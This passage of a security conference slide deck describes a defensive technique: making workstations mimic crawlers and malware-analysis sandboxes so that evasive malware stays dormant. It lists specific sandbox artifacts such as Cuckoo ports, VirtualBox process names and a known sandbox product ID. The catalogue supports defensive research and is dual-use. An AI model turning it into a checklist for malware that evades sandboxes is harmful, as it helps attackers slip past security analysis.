  • 34. Inoculation / Distribution Evasion Pretend you’re google bot: 1. Firefox: Install User-Agent-Switcher 2. Set User-Agent to: Googlebot-Image (Googlebot) Pretend none of your plugins are enabled: 1. Firefox: Go to Tools > Add Ons 2. For everything in the list, select “Ask To Activate” (Java, Adobe Acrobat, Flash, Silverlight, Office, PDF Reader, ...) Disable Referers: 1. Firefox: Go to about:config 2. Set “network.http.sendRefererHeader” to 0
  • 35. Inoculation / Distribution Evasion Request Suspicious Content Twice: This doesn’t exist yet, but what if…. iframe: badsite.com I F R A M E embedded flash repeat: badsite.com IFRAME V A L I D A T O R Bad Server no embedded flash iframe: goodsite.com no embedded flash Good Server
  • 36. Inoculation / Sandbox Evasion Permanent Debugger 1. Install a debugger 2. Hook every process automatically Spoof VMWare Artifacts: 1. Create stub exe called “VBoxService.exe” and leave it running on boot. Skew your clock 1. Change system time to be 1 year behind 2. Disable clock syncing
  • 37. Inoculation / Sandbox Evasion Sandbox Emulation 1. Open ports (cuckoo: 2042, mongodb: 27017) 2. Configure as Cuckoo Guest: http://docs.cuckoosandbox.org/en/latest/installation/guest/ But make sure to cripple the agent! These changes may result in instability to the system, and would require some additional testing in a well used desktop environment. 1. Add a dll named “dbghelp.dll” to registry so it loads into every process 2. Temporarily Assign windows product ID of “76487-337-8429955-22614” (Assign on boot, revert on shutdown) Look into Anubis, JoeBox, CWSandBox, ThreatExpert, and Cuckoo. The
  • 38. Conclusion Practicality: As it stands, these techniques require some complex administrative/programming tasks, and would need to be updated regularly. Ideally these types of techniques could be packaged into software that automatically updates and manages settings for you.
  • 39. Conclusion Perceived Efficacy: With just these 5 strategies, we were able to prevent 20% of malware activity in the samples we analyzed. True Efficacy: Hard to say how effective it really is, because the samples this works on, are less likely to be identified as known malware. Fortunately, this means it will reduce malware infection for samples your AV is unlikely to detect with signatures.
  • 40. More Information Contact Info: Email: kadams@juniper.net Twitter: kadams_sec LinkedIn: https://www.linkedin.com/in/adamsk Presentation Material: http://forums.juniper.net/t5/Security-Mobility-Now/bg-p/networkingnow References: http://www.fireeye.com/blog/technical/malware-research/2011/01/the-dead-giveaways-of-vm-awaremalware.html